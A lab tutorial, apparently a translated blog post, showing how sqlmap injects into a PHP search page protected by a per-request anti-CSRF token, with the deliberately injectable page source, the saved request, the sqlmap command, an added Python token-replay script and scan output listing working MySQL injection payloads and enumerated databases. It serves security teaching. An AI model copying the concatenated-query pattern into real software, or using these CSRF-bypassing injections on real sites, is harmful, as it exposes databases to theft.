1. Demo page
<?php
session_start();
// Token check: only enforced once a session token exists and a search was submitted.
if (isset($_SESSION['token']) && isset($_POST['username'])) {
    if (empty($_POST['token']) || $_POST['token'] != $_SESSION['token']) {
        header('Location: http://localhost/error.php?token=' . $_SESSION['token']);
        exit(-1);
    }
}
// A fresh token is issued on every request, so a captured token is good for one submission only.
$token = md5(time());
$_SESSION['token'] = $token;
?>
<html>
<head>
<title>sqlmap with csrf token</title>
</head>
<body>
<form method="post" action="/sql/csrf.php" id="form1">
<div>
<input name="username" type="text" id="username" style="width:270px;"/>
<input type="submit" name="btnSearch" value="Search" id="btnSearch" />
<input type="hidden" name="token" id="token" value="<?php echo $token ?>" />
</div>
</form>
<br/>
</body>
</html>
<?php
if (isset($_POST['username'])) {
    $conn = mysql_connect('127.0.0.1', 'root', '123456');
    if (!$conn) {
        die('Database connection error' . mysql_error());
    } else {
        mysql_select_db('test', $conn);
        $user_name = $_POST['username'];
        // Deliberately injectable: user input is concatenated straight into the query.
        $sql = "select * from user where username='$user_name'";
        $result = mysql_query($sql) or die('error' . mysql_error());
        while ($row = mysql_fetch_array($result)) {
            $username = $row['username'];
            $age = $row['age'];
            $sex = $row['sex'];
            echo $username . '   ';
            echo $age . '   ';
            echo $sex;
            echo "<br />";
        }
    }
    mysql_close($conn);
} else {
    echo "username is null";
}
?>
Notes:
(1) The file name and path must match the form's action URL in the page (/sql/csrf.php), otherwise the submission never reaches the token check;
(2) Adjust the database connection account, password, database name, table name and column names to your own setup.
2. Demonstration of the page's token protection
3. SQL injection demonstration (this time using -r to supply the HTTP request content)
The HTTP request content is as follows:
POST /sql/csrf.php HTTP/1.1
Host: 192.168.2.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.235/sql/csrf.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Connection: close
Cookie: PHPSESSID=6c5c85b72a489b88b1d0c84664d611e6
Upgrade-Insecure-Requests: 1

username=cisco&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df
The sqlmap command is as follows:
sqlmap -r data/test.txt -p "username" --csrf-token="token" --csrf-url="http://192.168.2.235/sql/csrf.php" --batch --dbs
-r: the file holding the saved HTTP request; sqlmap takes the method, URL, headers, cookie and body from it;
-p: name of the parameter to inject into;
--csrf-token: name of the form field that carries the anti-CSRF token;
--csrf-url: the page to fetch the token from (i.e. which page you visit to obtain a token value); sqlmap requests it before each test request and copies the fresh value into the field named by --csrf-token. Because this page stores the token in $_SESSION, the Cookie header in the request file must be kept, so that the token is fetched and spent in the same PHPSESSID;
--batch: no interaction during the scan, every prompt takes its default value;
--dbs: enumerate all databases.
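As an added example (not from the original post and not sqlmap's own code), the Python script below does by hand what --csrf-token="token" --csrf-url=... automate: it parses the saved request that -r points at, reads the hidden token out of the form page fetched in the same session, and rewrites the POST body with the fresh token before replaying it. The request file, the HTML of the token page and the token value 842f8206097c083d319474122f6a9aca are constructed samples; the lab address 192.168.2.235 is assumed reachable only for the optional network call in fetch_fresh_token(), everything else runs offline.

```python
"""Added example (not from the original post, nor sqlmap's own code): the
anti-CSRF round trip that --csrf-token/--csrf-url automate, done by hand.
1. parse the saved raw request that -r points at,
2. GET the form page with the SAME session cookie and read the hidden token,
3. rewrite the saved POST body with the fresh token before replaying it.
Only fetch_fresh_token() touches a server; the rest runs offline."""
import re
import urllib.parse
import urllib.request

# Constructed sample: the -r file from the post, trimmed to the headers that
# matter. Real captures use CRLF line endings; parse_raw_request() accepts both.
RAW_REQUEST = (
    "POST /sql/csrf.php HTTP/1.1\r\n"
    "Host: 192.168.2.235\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=6c5c85b72a489b88b1d0c84664d611e6\r\n"
    "Connection: close\r\n"
    "\r\n"
    "username=cisco&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df"
)

# Constructed sample of the demo page's form; the token value is hypothetical.
TOKEN_PAGE = """<html><body>
<form method="post" action="/sql/csrf.php" id="form1">
<input name="username" type="text" id="username"/>
<input type="submit" name="btnSearch" value="Search" id="btnSearch" />
<input type="hidden" name="token" id="token" value="842f8206097c083d319474122f6a9aca" />
</form></body></html>"""

INPUT_TAG = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
ATTRIBUTE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')


def parse_raw_request(raw):
    """Split a saved HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, path, headers, body


def extract_token(html, field="token"):
    """Return the value of <input name=field ...> in html, or None if absent."""
    for tag in INPUT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTRIBUTE.findall(tag)}
        if attrs.get("name") == field:
            return attrs.get("value")
    return None


def set_param(body, name, value):
    """Replace one parameter in a urlencoded body, keeping order and encoding."""
    params = urllib.parse.parse_qsl(body, keep_blank_values=True)
    if name not in dict(params):
        raise ValueError(f"no '{name}' parameter in body")
    return urllib.parse.urlencode([(k, value if k == name else v) for k, v in params])


def fetch_fresh_token(csrf_url, cookie, field="token"):
    """GET the form page inside the existing session and read the new token.

    The demo stores the token in $_SESSION, so this GET must carry the same
    PHPSESSID as the replayed POST; a token minted in another session is
    rejected with the 302 to error.php that the post shows."""
    req = urllib.request.Request(csrf_url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_token(resp.read().decode("utf-8", "replace"), field)


def prepare_replay(raw, fresh_token, payload=None):
    """Build (url, headers, body) for one replay; payload overrides username,
    which is what sqlmap does for every test request."""
    _method, path, headers, body = parse_raw_request(raw)
    if payload is not None:
        body = set_param(body, "username", payload)
    body = set_param(body, "token", fresh_token)
    headers = dict(headers)
    headers["Content-Length"] = str(len(body))  # a stale length would truncate the body
    return f"http://{headers['Host']}{path}", headers, body


if __name__ == "__main__":
    # Offline walkthrough on the constructed samples.
    url, headers, body = prepare_replay(RAW_REQUEST, extract_token(TOKEN_PAGE),
                                        payload="cisco' AND 1=1-- x")
    print(url, body, sep="\n")
    # Against the lab from the post (assumed reachable), fetch the token live:
    # token = fetch_fresh_token("http://192.168.2.235/sql/csrf.php", headers["Cookie"])
```

The script makes the session binding explicit: the GET that mints the token and the POST that spends it must share the PHPSESSID cookie, which is why the Cookie header in the -r file matters. Note that the demo page's token is md5(time()), a per-request nonce with one-second resolution; it is enough to defeat naive replay, which is what this post is about, but it is not an unguessable CSRF secret.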
The execution result is as follows:
4. Appendix
In fact sqlmap recognizes a token-like parameter in the request on its own (a parameter whose name contains token or csrf) and asks whether it should update it in further requests; manual specification is only needed when the token is not that obvious. With --batch every prompt takes its default, so for unattended runs pass --csrf-token and --csrf-url explicitly. Also note that in the run below the injection points were resumed from the stored session of the earlier scan, and the first request with the stale captured token was answered with a 302 to error.php; for a clean comparison, rerun with --flush-session.
Without specifying the token, the test output looks like this:
e2a5e@kali:~$ sqlmap -r data/test.txt -p "username" --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:44:27 /2020-03-11/

[16:44:27] [INFO] parsing HTTP request from 'data/test.txt'
[16:44:27] [INFO] resuming back-end DBMS 'mysql'
[16:44:27] [INFO] testing connection to the target URL
got a 302 redirect to 'http://localhost/error.php?token=842f8206097c083d319474122f6a9aca'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: username=cisco' AND MAKE_SET(9310=9310,5577)-- tjnm&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=cisco' AND (SELECT 4942 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(4942=4942,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MAEB&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=cisco' AND (SELECT 2251 FROM (SELECT(SLEEP(5)))Fsfq)-- LbzZ&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: username=cisco' UNION ALL SELECT CONCAT(0x717a766b71,0x584e556d636866734867416a6853497858736e5949686e69454f616a4a5041426c56776d41734245,0x716a767671),NULL,NULL#&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df
---
[16:44:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[16:44:31] [INFO] fetching database names
available databases [9]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] test
[*] webug
[*] webug_sys
[*] webug_width_byte

[16:44:31] [INFO] fetched data logged to text files under '/home/e2a5e/.sqlmap/output/192.168.2.235'

[*] ending @ 16:44:31 /2020-03-11/